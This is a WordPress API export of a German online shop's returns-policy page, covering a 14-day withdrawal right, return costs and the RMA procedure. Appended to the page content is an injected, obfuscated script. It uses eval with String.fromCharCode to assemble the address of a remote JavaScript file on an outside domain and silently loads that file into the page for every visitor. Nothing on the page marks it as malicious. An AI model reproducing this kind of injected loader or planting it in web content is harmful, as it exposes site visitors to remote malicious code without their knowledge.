{"id":410,"date":"2016-02-12T13:18:16","date_gmt":"2016-02-12T13:18:16","guid":{"rendered":"http:\/\/shopingpoint.de\/www\/fliqua\/?page_id=410"},"modified":"2016-03-13T19:23:00","modified_gmt":"2016-03-13T18:23:00","slug":"widerrufsbedingungen","status":"publish","type":"page","link":"https:\/\/www.fliqua.de\/?page_id=410","title":{"rendered":"Widerrufsbedingungen"},"content":{"rendered":"<p>Hiermit r\u00e4umen wir f\u00fcr die Eink\u00e4ufe in unseren Onlineshop ein 14 -t\u00e4giges Widerrufsrecht ab dem Erhalt der Ware ein.<\/p>\n<p>Wird der Kauf innerhalb 14 Tage nach Bestellung widerrufen, nehmen wir die Wahre nach Pr\u00fcfung auf Unversehrtheit und Vollst\u00e4ndigkeit wieder zur\u00fcck und schreiben Ihrem Konto den gezahlten Betrag gut.<\/p>\n<p>Die Kosten f\u00fcr die R\u00fccksendung der Artikel tr\u00e4gt der K\u00e4ufer. Wird durch den K\u00e4ufer zu einem sp\u00e4teren Zeitpunkt widerrufen, so obliegt es Ihm glaubhaft zu machen, dass vom Erhalt der Ware bis zum Widerruf 14 Tage vergangen sind.<\/p>\n<p>Grunds\u00e4tzlich ist vor R\u00fccksendung von Artikeln bei uns eine R\u00fccksendungsnummer (RMA-Nummer) zu beantragen. Waren ohne RMA Nummer werden von uns grunds\u00e4tzlich nicht zur\u00fcck genommen. Es sei denn, Sie kommen bei uns pers\u00f6nlich vorbei.<\/p>\n<p>RMA Nummern erhalten Sie entweder durch Zusendung Ihrer Rechnungskopie per EMail oder Post in Verbindung mit dem Grund Ihrer R\u00fccksendung. Sie k\u00f6nnen Ihren RMA-Antrag auch gleich direkt \u00fcber diesen Link erstellen.\u00a0 Wir setzen uns dann umgehend mit Ihnen in Verbindung. Vielen Dank.<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/?page_id=677\"><button>Hier geht\u00b4s zum R\u00dcCKSENDEFORMULAR<\/button><\/a><\/p>\n<p>Bitte Schreiben Sie uns unter Angabe der Rechnungsnummer und des Empfangsdatums, Ihrer Lieferadresse und gerne auch dem Grund der R\u00fccksendung.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<br \/>\n<script type=text\/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><script type=text\/javascript> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hiermit r\u00e4umen wir f\u00fcr die Eink\u00e4ufe in unseren Onlineshop ein 14 -t\u00e4giges Widerrufsrecht ab dem Erhalt der Ware ein. Wird der Kauf innerhalb 14 Tage nach Bestellung widerrufen, nehmen wir die Wahre nach Pr\u00fcfung auf Unversehrtheit und Vollst\u00e4ndigkeit wieder zur\u00fcck und schreiben Ihrem Konto den gezahlten Betrag gut. Die Kosten f\u00fcr die R\u00fccksendung der Artikel [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"tags":[],"class_list":["post-410","page","type-page","status-publish","hentry"],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/410","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=410"}],"version-history":[{"count":17,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/410\/revisions"}],"predecessor-version":[{"id":688,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/410\/revisions\/688"}],"wp:attachment":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=410"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=410"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}